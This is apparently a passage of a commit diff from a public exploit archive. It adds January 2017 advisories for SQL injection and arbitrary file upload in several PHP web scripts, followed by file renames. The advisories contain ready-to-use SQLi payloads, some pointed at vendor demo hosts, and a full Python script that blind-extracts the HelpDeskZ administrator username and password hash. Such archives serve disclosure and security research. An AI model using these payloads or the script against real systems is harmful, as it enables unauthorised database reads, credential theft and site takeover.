Multi Vendor Script v6.49 offers a robust eCommerce platform. The script has been designed to deliver all major features required to run an eCommerce website.
Type of vulnerability:
An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/multi-vendor-shopping-script/product-list.php?pl=[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' RLIKE (SELECT (CASE WHEN (6851=6851) THEN 0x313132303166663164653737343030356638646131336634323934333838316336353566 ELSE 0x28 END))-- HnQm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' AND SLEEP(5)-- WHze
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL#
---

34
platforms/php/webapps/41194.txt Executable file
View file

@ -0,0 +1,34 @@
Exploit Title: Itech News Portal Script v6.28 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/news-portal-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
News Portal Script v6.28 is a CMS Software developed as a news broadcasting portal. This product is considered as the best in this category.
Type of vulnerability:
An SQL Injection vulnerability in News Portal Script v6.28 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/news-portal-script/information.php?inf=22[payload]
Parameter: inf (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: inf=22 AND 3993=3993
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: inf=22 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS

34
platforms/php/webapps/41195.txt Executable file
View file

@ -0,0 +1,34 @@
Exploit Title: Itech Real Estate Script v3.12 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/real-estate-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
Type of vulnerability:
An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/real-estate-script/search_property.php?property_for=1[payload]
Parameter: property_for (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: property_for=1 AND 4574=4574
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: property_for=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo

35
platforms/php/webapps/41197.txt Executable file
View file

@ -0,0 +1,35 @@
# # # # #
# Exploit Title: PHP Product Designer Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: https://codecanyon.net/item/php-product-designer/19334412
# Software Buy: https://codecanyon.net/item/php-product-designer/19334412
# Demo: http://phpproductdesigner.000webhostapp.com/products.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/products.php / Create New Design
# http://localhost/[PATH]/theme/images/uploads/[......PHP]
# # # # #
# uploadImage.php
<?php
$output_dir = "./theme/images/uploads/";
.
.
.
$imagetemp = explode(".", $_FILES["imagefile"]["name"]);
$newimagename = round(microtime(true)) . '.' . end($imagetemp);
//move the uploaded file to uploads folder;
move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
echo $output_dir . $newimagename;
}
}
?>
# # # # #

35
platforms/php/webapps/41198.txt Executable file
View file

@ -0,0 +1,35 @@
# # # # #
# Exploit Title: PHP Logo Designer Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: https://codecanyon.net/item/php-logo-designer/19362231
# Software Buy: https://codecanyon.net/item/php-logo-designer/19362231
# Demo: http://phplogodesigner.000webhostapp.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/designer.php
# http://localhost/[PATH]/theme/images/uploads/[......PHP]
# # # # #
# uploadImage.php
<?php
$output_dir = "./theme/images/uploads/";
.
.
.
$imagetemp = explode(".", $_FILES["imagefile"]["name"]);
$newimagename = round(microtime(true)) . '.' . end($imagetemp);
//move the uploaded file to uploads folder;
move_uploaded_file($_FILES["imagefile"]["tmp_name"],$output_dir. $newimagename);
echo $output_dir . $newimagename;
}
}
?>
# # # # #

38
platforms/php/webapps/41199.txt Executable file
View file

@ -0,0 +1,38 @@
Exploit Title: Video Sharing Script 4.94 SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/video-sharing-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Video Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.
Type of vulnerability:
An SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read
arbitrary data from the database.
Vulnerability:
http://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

172
platforms/php/webapps/41200.py Executable file
View file

@ -0,0 +1,172 @@
'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download
# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket
# Date: 2017-01-30
# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl )
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments.
Software after ticket submit allow to download attachment by entering following link:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1(ATTACHMENT_ID_HERE)
FILE: view_tickets_controller.php
LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]);
third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization
Steps to reproduce:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1 or id>0 -- -
by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment.
Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD)
steps:
1. go to http://192.168.100.115/helpdesk/?v=submit_ticket
2. Submit a ticket with valid email (important we need password access).
3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query).
4. Get the password from email.
4. run script
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123
where http://192.168.100.115/helpdesk/ = base url to helpdesk
localhost@localhost.com = email which we use to submit the ticket
password123 = password that system sent to our email
Output of script:
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123
2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk
2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/
2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login
2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets
2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket&param[]=6&param[]=attachment&param[]=1&param[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20-
...
------------------------------------------
username: admin
password: sha256(53874ea55571329c04b6998d9c7772c9274d3781)
'''
import requests
import sys
if( len(sys.argv) < 3):
print "put proper data like in example, remember to open a ticket before.... "
print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123"
exit()
EMAIL = sys.argv[2]
PASSWORD = sys.argv[3]
URL = sys.argv[1]
def get_token(content):
token = content
if "csrfhash" not in token:
return "error"
token = token[token.find('csrfhash" value="'):len(token)]
if '" />' in token:
token = token[token.find('value="')+7:token.find('" />')]
else:
token = token[token.find('value="')+7:token.find('"/>')]
return token
def get_ticket_id(content):
ticketid = content
if "param[]=" not in ticketid:
return "error"
ticketid = ticketid[ticketid.find('param[]='):len(ticketid)]
ticketid = ticketid[8:ticketid.find('"')]
return ticketid
def main():
# Start a session so we can have persistant cookies
session = requests.session(config={'verbose': sys.stderr})
r = session.get(URL+"")
#GET THE TOKEN TO LOGIN
TOKEN = get_token(r.content)
if(TOKEN=="error"):
print "cannot find token"
exit();
#Data for login
login_data = {
'do': 'login',
'csrfhash': TOKEN,
'email': EMAIL,
'password': PASSWORD,
'btn': 'Login'
}
# Authenticate
r = session.post(URL+"/?v=login", data=login_data)
#GET ticketid
ticket_id = get_ticket_id(r.content)
if(ticket_id=="error"):
print "ticketid not found, open a ticket first"
exit()
target = URL +"?v=view_tickets&action=ticket&param[]="+ticket_id+"&param[]=attachment&param[]=1&param[]=1"
limit = 1
char = 47
prefix=[]
while(char!=123):
target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_prefix).content
if "couldn't find" not in response:
prefix.append(char)
limit=limit+1
char=47
else:
char=char+1
table_prefix = ''.join(chr(i) for i in prefix)
table_prefix = table_prefix[0:table_prefix.find('staff')]
limit = 1
char = 47
admin_u=[]
while(char!=123):
target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_username).content
if "couldn't find" not in response:
admin_u.append(char)
limit=limit+1
char=47
else:
char=char+1
limit = 1
char = 47
admin_pw=[]
while(char!=123):
target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_password).content
if "couldn't find" not in response:
admin_pw.append(char)
limit=limit+1
char=47
else:
char=char+1
admin_username = ''.join(chr(i) for i in admin_u)
admin_password = ''.join(chr(i) for i in admin_pw)
print "------------------------------------------"
print "username: "+admin_username
print "password: sha256("+admin_password+")"
if admin_username=="" and admin_password=='':
print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_"
print "try to submit ticket with attachment"
if __name__ == '__main__':
main()

20
platforms/php/webapps/41201.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Itech Classifieds Script v7.27 - 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/classifieds-script/
# Demo: http://itechscripts.com/classifieds-script/
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/message.php?pid=[SQL]
# E.t.c
# # # # #

19
platforms/php/webapps/41202.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Itech Dating Script v3.26 - 'send_gift.php' SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com/
# Version: 3.26
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/send_gift.php?id=[SQL]
# E.t.c
# # # # #

18
platforms/php/webapps/41203.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Itech Real Estate Script v3.12 - 'id' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/real-estate-script/
# Demo: http://real-estate.itechscripts.com
# Version: 3.12
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/agent_search_property.php?id=[SQL]
# E.t.c
# # # # #

0
platforms/windows/local/11112.c → platforms/win_x86/local/11112.c
View file

2
platforms/windows/local/18861.php → platforms/win_x86/local/18861.php
View file

@ -13,7 +13,7 @@
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log">&lt;/textarea&gt;
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {

0
platforms/windows/local/3451.c → platforms/win_x86/local/3451.c
View file

0
platforms/windows/local/3888.c → platforms/win_x86/local/3888.c
View file

0
platforms/windows/local/3912.c → platforms/win_x86/local/3912.c
View file

0
platforms/windows/local/39432.c → platforms/win_x86/local/39432.c
View file

0
platforms/windows/local/39574.cs → platforms/win_x86/local/39574.cs
View file

0
platforms/windows/local/40564.c → platforms/win_x86/local/40564.c
View file

0
platforms/windows/local/40627.c → platforms/win_x86/local/40627.c
View file

0
platforms/windows/local/8799.txt → platforms/win_x86/local/8799.txt
View file

0
platforms/windows/remote/1264.pl → platforms/win_x86/remote/1264.pl
View file

0
platforms/windows/remote/3680.sh → platforms/win_x86/remote/3680.sh
View file

0
platforms/windows/remote/3822.c → platforms/win_x86/remote/3822.c
View file

0
platforms/windows/remote/4754.pl → platforms/win_x86/remote/4754.pl
View file

0
platforms/windows/remote/5079.c → platforms/win_x86/remote/5079.c
View file

0
platforms/windows/remote/5330.c → platforms/win_x86/remote/5330.c
View file

0
platforms/windows/remote/584.c → platforms/win_x86/remote/584.c
View file

0
platforms/windows/remote/6100.py → platforms/win_x86/remote/6100.py
View file